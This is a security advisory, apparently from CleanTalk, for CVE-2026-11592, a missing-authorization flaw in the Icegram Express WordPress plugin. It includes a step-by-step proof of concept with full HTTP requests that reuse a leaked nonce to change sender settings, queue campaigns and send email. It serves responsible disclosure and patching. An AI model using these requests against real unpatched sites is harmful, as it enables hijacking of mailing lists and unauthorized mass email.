CVE-2026-11592 affects Email Subscribers & Newsletters, also known as Icegram Express, through version 5.9.27. A Contributor can open the hidden es_template editor, read the shared ig-es-admin-ajax-nonce from ig_es_js_data.security, and reuse it against AJAX handlers that do not enforce an effective capability check. The exposed workflow permits unauthorized mail setting changes, audience and campaign manipulation, contact imports, persistent workflows, and immediate email dispatch. The issue is fixed in version 5.9.28.
| CVE | CVE-2026-11592 |
| Plugin Version | Email Subscribers & Newsletters (Icegram Express) <= 5.9.27, fixed in 5.9.28 |
| All Time | 13 030 589 |
| Active installations | 50 000+ |
| Publicly Published | July 1, 2026 |
| Last Updated | July 2, 2026 |
| Researcher | Dmitrii Ignatyev |
| CWE | CWE-862 – Missing Authorization |
| PoC | Yes |
| Exploit | No |
| Reference | https://www.cve.org/CVERecord?id=CVE-2026-11592 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/email-subscribers/email-subscribers-newsletters-5927-missing-authorization-to-authenticated-contributor-settings-modification-via-ig-es-handle-request-ajax-action |
| Plugin Security Certification by CleanTalk | ![]() |
| Logo of the plugin |
PSC by CleantalkJoin the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.
Timeline
| April 1, 2026 | Plugin testing and vulnerability detection in Icegram Express 5.9.24 were completed. |
| April 1, 2026 | The vulnerability report was sent to all relevant parties with the PoC, technical description, and recommendations for remediation. |
| July 1, 2026 | Wordfence publicly published the advisory for CVE-2026-11592. |
| July 2, 2026 | The CVE-2026-11592 record was published in the CVE Program registry. |
Discovery of the Vulnerability
The issue was identified in Icegram Express 5.9.24. The plugin registers es_template with the standard post capability model, enables its editor UI, and only hides it from the plugin menu. A default Contributor who has edit_posts can therefore browse directly to /wp-admin/post-new.php?post_type=es_template. On that screen, Email_Subscribers_Admin::enqueue_scripts() localizes a global ig_es_js_data.security value created for ig-es-admin-ajax-nonce.
Possession of that nonce unlocks several authenticated AJAX handlers that rely on the nonce without enforcing the privilege needed for the operation. In the tested version, IG_ES_Onboarding::handle_request() validates security and dispatches the supplied request to a matching onboarding method without a capability check. The same pattern appears in broadcast drafting, contact import, workflow creation and status changes, template actions, and test email delivery.
The resulting access extends beyond one setting. A Contributor can overwrite sender details, create lists and contacts, alter or create newsletter content, configure forms and widgets, import audiences, add active workflows, queue campaigns, dispatch accumulated mail, and reset onboarding state so the sequence can be repeated. Wordfence classifies the issue as Medium with a CVSS score of 4.3 because the documented impact affects integrity and requires a low-privileged authenticated account.
Understanding of Missing Authorization attacks
A WordPress nonce is an anti-CSRF token. It shows that a request originated from a valid session in the expected time window, but it does not prove that the current user may perform the requested operation. Every privileged AJAX handler still needs a capability check that matches its side effect, such as managing plugin settings, campaigns, contacts, templates, or workflows.
Hiding a post type from the menu also does not restrict access to its editor URL. In this case, the hidden template screen exposes a reusable plugin nonce to Contributors, then many handlers treat that value as sufficient authorization. This is CWE-862 – Missing Authorization. The shared nonce broadens the flaw because one leaked value crosses several administrative features instead of protecting a single narrowly scoped operation.
Exploiting the Missing Authorization Vulnerability
The following non-destructive reproduction uses an isolated local site with Icegram Express 5.9.24, a default Contributor account, reserved example.test addresses, and outbound mail disabled or captured by a local mail sink. Replace the placeholders with values from that test session only.
POC:
POC: 1. Install and activate Icegram Express 5.9.24 on an isolated WordPress test site. Disable external mail delivery or use a local mail sink. 2. Sign in with a default Contributor account. 3. Open http://127.0.0.1/wordpress/wp-admin/post-new.php?post_type=es_template 4. Read ig_es_js_data.security from the page source or browser console. 5. Replace <IG_ES_NONCE> and <CONTRIBUTOR_SESSION_COOKIE> below with values from the isolated test session. 6. Send the following requests in order. GET /wordpress/wp-admin/admin-ajax.php?action=ig_es_handle_request&request=perform_configuration_tasks&security=<IG_ES_NONCE>&es_from_name=Security%20Team&es_from_email=alerts%40example.test&enable_double_optin=no&emails[]=recipient1%40example.test&emails[]=recipient2%40example.test HTTP/1.1 Host: 127.0.0.1 Accept: application/json Referer: http://127.0.0.1/wordpress/wp-admin/post-new.php?post_type=es_template X-Requested-With: XMLHttpRequest Cookie: <CONTRIBUTOR_SESSION_COOKIE> GET /wordpress/wp-admin/admin-ajax.php?action=ig_es_draft_broadcast&security=<IG_ES_NONCE>&broadcast_data[id]=16&broadcast_data[subject]=Quarterly%20Update&broadcast_data[body]=%3Cp%3ELocal%20test%3C%2Fp%3E&broadcast_data[status]=1 HTTP/1.1 Host: 127.0.0.1 Accept: application/json Referer: http://127.0.0.1/wordpress/wp-admin/post-new.php?post_type=es_template X-Requested-With: XMLHttpRequest Cookie: <CONTRIBUTOR_SESSION_COOKIE> GET /wordpress/wp-admin/admin-ajax.php?action=ig_es_handle_request&request=queue_default_broadcast_newsletter&security=<IG_ES_NONCE> HTTP/1.1 Host: 127.0.0.1 Accept: application/json Referer: http://127.0.0.1/wordpress/wp-admin/post-new.php?post_type=es_template X-Requested-With: XMLHttpRequest Cookie: <CONTRIBUTOR_SESSION_COOKIE> GET /wordpress/wp-admin/admin-ajax.php?action=ig_es_handle_request&request=dispatch_emails_from_server&security=<IG_ES_NONCE> HTTP/1.1 Host: 127.0.0.1 Accept: application/json Referer: http://127.0.0.1/wordpress/wp-admin/post-new.php?post_type=es_template X-Requested-With: XMLHttpRequest Cookie: <CONTRIBUTOR_SESSION_COOKIE> GET /wordpress/wp-admin/admin-ajax.php?action=ig_es_send_workflow_action_test_email&security=<IG_ES_NONCE>&es_test_email=recipient%40example.test&subject=Local%20test&content=%3Cp%3EHello%3C%2Fp%3E&trigger=ig_es_user_subscribed&template=none&heading=Hi HTTP/1.1 Host: 127.0.0.1 Accept: application/json Referer: http://127.0.0.1/wordpress/wp-admin/post-new.php?post_type=es_template X-Requested-With: XMLHttpRequest Cookie: <CONTRIBUTOR_SESSION_COOKIE> 7. As the test site administrator, confirm that the sender settings, lists, contacts, draft campaign, queue state, and locally captured test mail were changed by the Contributor session.____
The requests use the same nonce extracted from the hidden template editor. The important result is that a default Contributor can reach side effects reserved for plugin administrators. The local mail sink keeps the reproduction contained while still confirming queue and delivery behavior.
Recommendations for Improved Security
Site owners should update Icegram Express to 5.9.28 or a later patched release, as specified in the advisory. Review sender settings, audience lists, imported contacts, campaigns, workflows, forms, widgets, and recent mail logs for unexpected changes. If an immediate update is not possible, disable the plugin until it can be patched and remove untrusted Contributor access from the affected site.
Developers should require an explicit WordPress capability before every privileged AJAX side effect and verify access to each referenced campaign, list, workflow, template, or settings group. Nonces should be narrowly scoped to the operation and should never replace authorization. Administrative scripts and their nonces must not load on screens reachable through generic edit_posts permission. State-changing operations should use POST requests, but the request method remains separate from capability enforcement.
Enforcing capability checks around CVE-2026-11592 prevents a Contributor from turning a shared admin nonce into control over Icegram Express settings, contacts, campaigns, workflows, and mail delivery. Applying the patched release closes this reported path.
#WordPressSecurity #MissingAuthorization #IcegramExpress #EmailSecurity #WebsiteSafety #StayProtected
Use CleanTalk solutions to improve the security of your website
